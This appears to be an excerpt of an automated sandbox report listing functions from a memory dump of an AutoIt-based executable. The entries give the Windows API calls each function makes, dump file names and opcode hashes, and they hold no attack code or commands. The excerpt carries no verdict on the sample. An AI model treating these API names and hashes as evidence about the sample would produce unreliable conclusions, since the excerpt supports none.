                                                                                                                                                                                      • Instruction Fuzzy Hash: 57B09B71059B08A7D6002BA1EC097443F58D704666F004021F51E441A0976354505752
                                                                                                                                                                                      Function 0093113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2ade164727656999f68249b8eb07ae6a14af3d2991aae22e0467a4aac5faae46
                                                                                                                                                                                      • Instruction ID: 69867bcc513e07b0219bc5db2624b169a03fd24d1890035db1ff65e4e050cfcd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ade164727656999f68249b8eb07ae6a14af3d2991aae22e0467a4aac5faae46
                                                                                                                                                                                      • Instruction Fuzzy Hash: A9B1CF20D3AF414DD62396398831337B65CAFBB2D5F92D71BFC2A74D62EB2185935280
                                                                                                                                                                                      Function 0095703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 00957057
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                      • Opcode ID: d11bf1e39e1ce19b2aff327b3ae6de052d0d274326b5379741a0e63df8d3539f
                                                                                                                                                                                      • Instruction ID: 4a42e1fb5e82bc9554edef62edcdfb105721b6196c6a158ca7b0bed029181103
                                                                                                                                                                                      • Opcode Fuzzy Hash: d11bf1e39e1ce19b2aff327b3ae6de052d0d274326b5379741a0e63df8d3539f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 53E092352042049FC700EFAAD404A96F7DDAF94350F008426B945C7291DAB0E8048B90
                                                                                                                                                                                      Function 00947DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00947DF8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2434400541-0
                                                                                                                                                                                      • Opcode ID: 95be8a0d737e0e5ef8147234499e35c79abcb7be5c41901a19c426e082f07e6c
                                                                                                                                                                                      • Instruction ID: bfa36b04d342ea124b45d4f1e372422567321c7b56cf9316d741e0cbde8d62c8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 95be8a0d737e0e5ef8147234499e35c79abcb7be5c41901a19c426e082f07e6c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 20D05EA097CA0E79FD1807A09C2FF3A820CEB40780FA14E4AB102C60C1EF9468046034
                                                                                                                                                                                      Function 00928E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00928E1F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                      • Opcode ID: f8c4dc131a5b383d4f5f3f4eaddae876fe22959806b27b14245a300f74dc85b4
                                                                                                                                                                                      • Instruction ID: 88b5d9b14299e6d882ac273db0204e3afebe38ed3f5fdd7be0f5031a15a35f1f
                                                                                                                                                                                      • Opcode Fuzzy Hash: f8c4dc131a5b383d4f5f3f4eaddae876fe22959806b27b14245a300f74dc85b4
                                                                                                                                                                                      • Instruction Fuzzy Hash: F0A0243000450CF7CF003F51FC044447F5CD7041547004031F40D00131D733541057C1
                                                                                                                                                                                      Function 0092A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00926AE9,009B67D8,00000014), ref: 0092A937
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                      • Opcode ID: 0a5d24ab85e62923712e06d5d454956f704d365075b87f0433386e047d9f163c
                                                                                                                                                                                      • Instruction ID: 2e0cefa05c26a91865ccb5138cdb0051bdf10b47efe06d3311da6170570dd74d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5d24ab85e62923712e06d5d454956f704d365075b87f0433386e047d9f163c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 94B012B071B1028BD70C4B38BC5861A3AD45B8D101301403D7003C36A0DB308410FF00
                                                                                                                                                                                      Function 00920EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                                      • Instruction ID: e82da1093d19098fcddbf6bdf89df649e76f133c04c18e03b09aa34aabf3c2af
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 41C113722091B349DF2D463AE43543EFAA45AF27B135A076DE4B3CB4CAEE24C534C660
                                                                                                                                                                                      Function 009212F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                                      • Instruction ID: d53238daded526f5e11abf70396e45a15a3bfde493381534ed87c43051ffb00c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                                      • Instruction Fuzzy Hash: 71C127722051B34ADF2D8639E43443EFAA55AF27B131A07ADE4B3CB4D9EE24C534D660
                                                                                                                                                                                      Function 00920A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                                      • Instruction ID: 6b85c90e9bf4fe1ee8d803f65d0b82bc2007e960cf5096d497f17a67ecc8380b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 79C107722052B349DF2D8639E43943EFBA55AE27B134A076DD4F3CB4CAEE24C564C660
                                                                                                                                                                                      Function 00920677 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                                      • Instruction ID: 2b7db3add0a6b74800281a1c9b9ce4aa4e1a18dd06bd4e313d4ddbad5f89479c
                                                                                                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                                                      • Instruction Fuzzy Hash: EBC1F4722051B34ADF2D4639E43943FBBA95EE27B134A076DD4B3CB4CAEE24D524C660
                                                                                                                                                                                      Function 0095A750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0095A7A5
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0095A7B7
                                                                                                                                                                                      • DestroyWindow.USER32 ref: 0095A7C5
                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0095A7DF
                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0095A7E6
                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0095A927
                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0095A937
                                                                                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095A97F
                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0095A98B
                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0095A9C5
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095A9E7
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095A9FA
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095AA05
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0095AA0E
                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095AA1D
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0095AA26
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095AA2D
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0095AA38
                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095AA4A
                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0098D9BC,00000000), ref: 0095AA60
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0095AA70
                                                                                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0095AA96
                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0095AAB5
                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095AAD7
                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095ACC4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                                      • Opcode ID: ed7fd976530e6abd75bb1586b37987257e37e86f55aa3fb75d4ce37f4484d13b
                                                                                                                                                                                      • Instruction ID: 9fb2a764bf147a4f55cd1ce38c0a619767f27c4f75c0d7f23d5941ce20f11643
                                                                                                                                                                                      • Opcode Fuzzy Hash: ed7fd976530e6abd75bb1586b37987257e37e86f55aa3fb75d4ce37f4484d13b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A027C71A10219EFDB14DFA5CC89EAE7BB9FF49310F008219F915AB2A1D730AD41DB64
                                                                                                                                                                                      Function 0096D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0096D0EB
                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0096D11C
                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0096D128
                                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0096D142
                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0096D151
                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0096D17C
                                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 0096D184
                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0096D18B
                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 0096D19A
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0096D1A1
                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0096D1EC
                                                                                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 0096D21E
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0096D249
                                                                                                                                                                                        • Part of subcall function 0096D385: GetSysColor.USER32(00000012), ref: 0096D3BE
                                                                                                                                                                                        • Part of subcall function 0096D385: SetTextColor.GDI32(?,?), ref: 0096D3C2
                                                                                                                                                                                        • Part of subcall function 0096D385: GetSysColorBrush.USER32(0000000F), ref: 0096D3D8
                                                                                                                                                                                        • Part of subcall function 0096D385: GetSysColor.USER32(0000000F), ref: 0096D3E3
                                                                                                                                                                                        • Part of subcall function 0096D385: GetSysColor.USER32(00000011), ref: 0096D400
                                                                                                                                                                                        • Part of subcall function 0096D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0096D40E
                                                                                                                                                                                        • Part of subcall function 0096D385: SelectObject.GDI32(?,00000000), ref: 0096D41F
                                                                                                                                                                                        • Part of subcall function 0096D385: SetBkColor.GDI32(?,00000000), ref: 0096D428
                                                                                                                                                                                        • Part of subcall function 0096D385: SelectObject.GDI32(?,?), ref: 0096D435
                                                                                                                                                                                        • Part of subcall function 0096D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0096D454
                                                                                                                                                                                        • Part of subcall function 0096D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0096D46B
                                                                                                                                                                                        • Part of subcall function 0096D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0096D480
                                                                                                                                                                                        • Part of subcall function 0096D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0096D4A8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3521893082-0
                                                                                                                                                                                      • Opcode ID: 7110dcb6b5bc5ad61435a5a9910910f87939a74d45627a9a20ce301b2a1fd7cb
                                                                                                                                                                                      • Instruction ID: 61e79d46f7417666494e2785f47e91e3d7a0b0c8b6785afcd132376a0a8bbcf1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7110dcb6b5bc5ad61435a5a9910910f87939a74d45627a9a20ce301b2a1fd7cb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3491AF7150E301AFCB109F64DC48E5BBBA9FF8A324F100A19F962962E0D775D940DB92
                                                                                                                                                                                      Function 009048C8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00904956
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00904998
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 009049A3
                                                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 009049AE
                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 009049B9
                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0097E179
                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0097E1B2
                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0097E5E0
                                                                                                                                                                                        • Part of subcall function 009049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00904954,00000000), ref: 00904A23
                                                                                                                                                                                      • SendMessageW.USER32 ref: 0097E627
                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0097E63E
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 0097E654
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 0097E65F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                                                                                      • Opcode ID: ce16ebfdb270393fbc6074de2d22ca8a52de2fbbb9d1eadfa9b0780147445d86
                                                                                                                                                                                      • Instruction ID: 67f48c60c566af6fc1f4224e0a99292e25a01fda0acc4fab69adf414c319f605
                                                                                                                                                                                      • Opcode Fuzzy Hash: ce16ebfdb270393fbc6074de2d22ca8a52de2fbbb9d1eadfa9b0780147445d86
                                                                                                                                                                                      • Instruction Fuzzy Hash: B912A271604201DFDB24DF24C884BAAB7E9BF49704F1485B9F5A9CB2A2C731EC45DB91
                                                                                                                                                                                      Function 0095A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0095A42A
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0095A4E9
